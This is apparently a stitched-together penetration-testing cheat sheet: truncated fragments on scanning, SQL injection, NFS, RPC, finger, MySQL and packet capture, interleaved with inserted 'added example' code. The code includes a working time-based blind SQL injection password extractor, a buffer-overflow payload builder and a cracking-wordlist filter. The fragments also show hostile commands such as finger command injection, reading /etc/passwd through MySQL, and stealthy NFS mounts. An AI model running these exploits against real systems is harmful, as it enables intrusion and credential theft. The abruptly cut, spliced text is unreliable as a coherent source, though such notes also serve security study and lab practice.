droopescan
Download: https://github.com/droope/droopescan
Or just install it via pip:
pip install droopescan
Scan a Drupal site:
droopescan scan drupal -u http://$target/ -t 32
Weevely
https://tools.kali.org/maintaining-access/weevely
Generates a PHP script that is placed on the server and can later be used to get a shell back.
Various scripts
Shellter (win32)
Dynamic shellcode injection tool that embeds a payload into ordinary Windows binaries.
https://tools.kali.org/maintaining-access/shellter
Create own (normal) shell
HTTPTunnel
Needs PHP; creates a file on a server which acts as an SSH proxy.
Nishang
Collection of PowerShell scripts for backdoors and more.
Kali: /usr/share/nishang
dns2tcp
Creates a TCP…
Commix
https://tools.kali.org/exploitation-tools/commix
Detects and exploits OS command injection (not SQL injection) automatically.
Directory enumeration
Hints: General search
nikto -host $victim
gobuster with a browser User-Agent (-a) and a small wordlist:
gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 60
Same with a larger wordlist:
gobuster dir -u http://$target/ -a 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60
Through a SOCKS proxy (-p, or via the HTTP_PROXY environment variable):
gobuster dir -u http://$target/ -p socks5://127.0.0.1:9991 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 60
HTTP_PROXY="socks4://127.0.0.1:9990/" gobuster dir -u http://$target/…
Union-based injections
Blind SQL injections
If a statement produces no visible output, try a time-based approach: make the injected expression sleep only when a condition on the data is true and measure the response time.
Enumerating in INSERTs
Assuming the INSERT statement is
INSERT INTO $tablename (email,name) VALUES ("email", "name");
then try a timing attack to determine whether a certain value is in a field:
INSERT INTO newsletter (name,email) VALUES ('name', ' ' AND…
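The timing attack above, carried through end to end as an added example (not code from the original notes): the vulnerable newsletter INSERT, the users table with the secret 's3cr3t', and the table/column names are all constructed here. SQLite is used so it runs offline; MySQL's SLEEP() is emulated with a user-defined function and MySQL's IF(cond, SLEEP(n), 0) is written as CASE WHEN ... END. The injected value is glued in with '+' instead of AND so that both operands are always evaluated (no short-circuiting) in both MySQL and SQLite.

```python
"""Time-based blind SQL injection through an INSERT statement (added example)."""
import sqlite3
import time

SLEEP_SECONDS = 0.1            # delay triggered when the injected condition is true
THRESHOLD = SLEEP_SECONDS / 2  # anything slower than this counts as "true"


def make_db():
    """Constructed target: in-memory DB with a secret to steal and the vulnerable newsletter table."""
    conn = sqlite3.connect(":memory:")
    # Emulate MySQL SLEEP(): block for s seconds, return 0.
    conn.create_function("SLEEP", 1, lambda s: time.sleep(s) or 0)
    conn.executescript(
        """
        CREATE TABLE users(name TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 's3cr3t');
        CREATE TABLE newsletter(name TEXT, email TEXT);
        """
    )
    return conn


def vulnerable_subscribe(conn, name, email):
    """Deliberately vulnerable (as in the note above): input concatenated into the INSERT.
    Nothing is returned to the caller, so time is the only side channel."""
    sql = f"INSERT INTO newsletter (name,email) VALUES ('{name}', '{email}')"
    conn.execute(sql)
    conn.commit()


def oracle(conn, condition):
    """True if the SQL condition holds, judged purely by response time.

    The email value becomes ''+(CASE WHEN cond THEN SLEEP(x) ELSE 0 END)+''.
    Every oracle call leaves a junk row in newsletter; on a real engagement
    that side effect is visible to the target.
    """
    payload = f"'+(CASE WHEN {condition} THEN SLEEP({SLEEP_SECONDS}) ELSE 0 END)+'"
    start = time.perf_counter()
    vulnerable_subscribe(conn, "name", payload)
    return time.perf_counter() - start > THRESHOLD


def extract_char(conn, position):
    """Binary-search the code point of one character of admin's password (0 = end of string)."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        # unicode() is SQLite's ORD()/ASCII(); past the end of the string it yields NULL,
        # the comparison is then never true and the search converges on 0.
        cond = (f"(SELECT unicode(substr(password,{position},1)) "
                f"FROM users WHERE name='admin') > {mid}")
        if oracle(conn, cond):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_secret(conn, max_len=32):
    """Pull the password character by character until the end-of-string marker."""
    secret = ""
    for position in range(1, max_len + 1):
        code = extract_char(conn, position)
        if code == 0:
            break
        secret += chr(code)
    return secret


def demo():
    conn = make_db()
    return extract_secret(conn)


if __name__ == "__main__":
    print(demo())
```

Against a real MySQL target the same loop works with ASCII(SUBSTRING(...)) and IF(..., SLEEP(5), 0) in the condition; raise the sleep and the threshold to something well above the network jitter you observe.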
List with a ton of one-liner web servers in various languages
HTTP (Python 2):
python -m SimpleHTTPServer 8000
HTTP (Python 3):
python3 -m http.server 8000
HTTPS (Ruby, self-signed certificate for localhost):
ruby -r webrick/https -e 'WEBrick::HTTPServer.new(Port: 8000, DocumentRoot: ".", SSLEnable: true, SSLCertName: [%w[CN localhost]]).start'
(!) See also Password spraying to check an obtained password against a list of usernames.
Note: Use http://rumkin.com/tools/cipher/ if you have to encode/decrypt/decipher something on the fly.
Wordlist optimization
If a password policy is known, remove every candidate the policy would have rejected before cracking; those can never be valid passwords.
Check password policy
In Windows, run net accounts to get information about account lockout, lockout thresholds, minimum password length etc.
Cloud-based performance cracking
See NPK
Default passwords
Hashcat
Am…
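Wordlist optimization against a known policy, as an added example that is not part of the original notes. The policy values (minimum length 8, three of four character classes, as a Windows complexity policy would require) and the small sample wordlist are constructed; in practice the numbers come from net accounts or the domain policy and the words from a file such as rockyou.txt.

```python
"""Trim a wordlist to candidates that satisfy a known password policy (added example)."""
import string


def matches_policy(word, min_len=8, max_len=64, classes_required=3):
    """Windows-style complexity: length bounds plus at least N of the four
    character classes (upper, lower, digit, other)."""
    if not (min_len <= len(word) <= max_len):
        return False
    classes = [
        any(c.isupper() for c in word),
        any(c.islower() for c in word),
        any(c.isdigit() for c in word),
        any(c in string.punctuation or c == " " for c in word),
    ]
    return sum(classes) >= classes_required


def filter_wordlist(words, **policy):
    """Keep only candidates the policy allows, in original order, without duplicates.
    Accepts any iterable of lines, so an open file streams through without loading it all."""
    seen = set()
    out = []
    for w in words:
        w = w.rstrip("\r\n")
        if w in seen or not matches_policy(w, **policy):
            continue
        seen.add(w)
        out.append(w)
    return out


# Constructed sample wordlist (a real run would read e.g. rockyou.txt line by line).
SAMPLE_WORDS = [
    "password", "Password1", "P@ssw0rd", "Summer2020!", "123456",
    "letmein", "Welcome1", "Welcome1", "qwerty", "Company2021",
]

if __name__ == "__main__":
    for w in filter_wordlist(SAMPLE_WORDS, min_len=8, classes_required=3):
        print(w)
```

For a file on disk, pass the open handle directly: filter_wordlist(open("rockyou.txt", encoding="latin-1"), min_len=8) and write the result out for hashcat or john.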
Display all available network shares:
showmount -e $target
Normal mount:
mount -t nfs $target:/home /mnt
Mounting with nfspy: with the hide option it mounts and immediately unmounts again on the server side, so the victim cannot see the new connection via showmount.
nfspy -o server=192.168.1.124:/home,hide,allow_other,ro,intr /mnt
Mount via SSH (forward the NFS port through the tunnel, then mount against the local port):
ssh -N -L 3049:localhost:2049 user@hostname
mount -t nfs -o port=3049…
tcp/135, udp/135; also as (Microsoft) RPC over HTTP on tcp/593.
Enumeration
Obtain general information:
# rpcinfo -p $target
# rpcinfo -s $target
Connect (hint: tab completion works; enum<tab> lists all enum commands):
rpcclient -U "" $target
Enumerate all API endpoints with one of the following options:
python /usr/local/bin/rpcdump.py $target |…
Enumeration
Show currently logged-in users:
finger @ip
User enumeration:
for username in $(cat cirt-default-usernames.txt); do finger $username@10.10.10.76 >> /tmp/finger; done
Enumeration with Metasploit:
msf5 > use auxiliary/scanner/finger/finger_users
msf5 auxiliary(scanner/finger/finger_users) > set rhosts 10.10.10.76
rhosts => 10.10.10.76
msf5 auxiliary(scanner/finger/finger_users) > run
Exploits
According to https://insecure.org/sploits_all.html, very old finger daemons allowed command execution, e.g. with
finger "|/bin/id@host"
Use bof1_web.py or bof1_socket.py to start.
Use bof1_socket_10.py to determine the position of EIP (send a cyclic pattern, then look up the offset of the bytes that land in EIP).
Use bof2_socket_20.py with the found EIP offset to verify that EIP was overwritten with B's.
Use bof3_socket_10.py with the found EIP offset to find all bad chars.
Use Mona to find a JMP address.
Create the payload, add it and profit.
0. Confirm vulnerability
Download…
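The offset, bad-char and payload steps above, implemented as an added example; this is not the bof*_socket.py scripts from the notes (which are not on this page) but stand-alone helpers you would call from them. The pattern scheme is the Metasploit one (Aa0Aa1Aa2...), so the offsets match pattern_offset.rb. The EIP value 0x41346141 and the return address 0x625011af used in the demo and tests are constructed, not taken from any real target.

```python
"""Cyclic pattern, EIP offset, bad-char probe and payload layout for a stack overflow (added example)."""
import string
import struct


def cyclic(length):
    """Metasploit-style non-repeating pattern; every 4-byte window is unique for ~20 KB."""
    out = bytearray()
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def find_offset(pattern, eip):
    """Offset of the bytes that ended up in EIP.
    'eip' is the register value as shown by the debugger (int, little-endian on x86)
    or the raw 4 bytes. Returns -1 if the value did not come from this pattern."""
    needle = struct.pack("<I", eip) if isinstance(eip, int) else bytes(eip)
    return pattern.find(needle)


def badchar_probe(exclude=(0x00,)):
    """All byte values except those already known to be bad (NUL by default).
    Send it right after the EIP offset and compare the memory dump byte by byte."""
    return bytes(b for b in range(256) if b not in exclude)


def first_missing(sent, dumped):
    """Compare the probe with what the debugger shows in memory; returns the first
    byte that was mangled or truncated, or None if everything survived.
    Re-run with that byte added to 'exclude' until nothing is missing."""
    for i, b in enumerate(sent):
        if i >= len(dumped) or dumped[i] != b:
            return b
    return None


def build_crash(offset, ret_addr, shellcode, total=None):
    """Assemble the final buffer: junk up to EIP, the return address (e.g. a JMP ESP
    found with Mona, packed little-endian), a NOP sled, then the shellcode.
    'total' pads the buffer to the original crash length, if the target needs it."""
    buf = b"A" * offset + struct.pack("<I", ret_addr) + b"\x90" * 16 + shellcode
    if total is not None:
        buf += b"C" * max(0, total - len(buf))
    return buf


if __name__ == "__main__":
    pattern = cyclic(300)
    print("EIP 0x41346141 sits at offset", find_offset(pattern, 0x41346141))
    print("probe length", len(badchar_probe()))
    print(build_crash(12, 0x625011af, b"\xcc" * 4, total=40).hex())
```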
Note that iptables and ip6tables should always be used together: rules in one do not apply to the other address family!
Tables
iptables manages a set of tables which act as ACLs (Access Control Lists).
Actions
Actions (targets) are defined via the -j option.
Examples
Show all rules:
iptables -L
ip6tables -L
Ignore all packets from a host/network:
iptables -A INPUT -s 192.168.5.1/32 -j DROP
ip6tables -A INPUT -s fd75:943b:5f2e:0:a4:45a1:b753:4152 -j…
tcpdump
Get incoming ICMP packets:
sudo tcpdump -i any icmp and src host $target
Useful parameters
Do not resolve names, show IPs: -n
Show packet contents in hex and ASCII: -X
Show packet contents in ASCII: -A
Working with files
Write dump to a file: tcpdump -w file
Read dump from a file: tcpdump -r file
Standard queries
tcpdump -n src|dst 10.10.10.10 and port…
See a packet in its context: context menu, choose Follow.
Show only ICMP packets from a host:
tcpdump host 10.11.1.128 and icmp -i tun0
Show other systems communicating outside the own address range (Wireshark display filter):
ip.addr == 10.11.1.0/24 && !(ip.addr == 192.168.119.0/24) && !dns && !browser && !ssdp && !nbns && !llmnr
Record audio
Wireshark can transform captured audio…
Start a screen session with a name: screen -S name
List screen sessions: screen -ls
Resume a screen session: screen -xS name
Connect:
mysql --host=10.10.10.13 -P4444 -u admin admin
Various commands:
Enumeration
Nmap scripts:
nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $victim
Through proxychains (TCP connect scan, no ping):
proxychains4 -q nmap -sV -sT -Pn -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 $victim
Exploitation
Read and write
Read a file with the privileges of the MySQL process:
SELECT load_file('/etc/passwd');
Write a file with the privileges of the MySQL daemon:
CREATE TABLE bbb(content TEXT);
INSERT INTO bbb (content)…
Versions before 2.2.10: SQL injection possible (https://packetstormsecurity.com/files/152356/CMS-Made-Simple-SQL-Injection.html)
Use dash, which (unlike bash without -p) does not drop privileges.
Arguments
ls
Sort by modification time, newest first: ls -t
Better history
Add this to .bashrc:
HISTSIZE=10000
HISTTIMEFORMAT='%F %T '
Handling files whose names start with -:
cp -- -file.txt file.txt
STDOUT, STDIN and STDERR (redirection)
Send STDERR (2) to STDOUT (1) as well: cmd 2>&1
man
Searching for a keyword in…
Personal collection of some infosec stuff. The primary purpose of this site is to collect and organize things for myself.
Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
python -c 'import pty;pty.spawn("/bin/bash")';
python3 -c 'import pty;pty.spawn("/bin/bash")';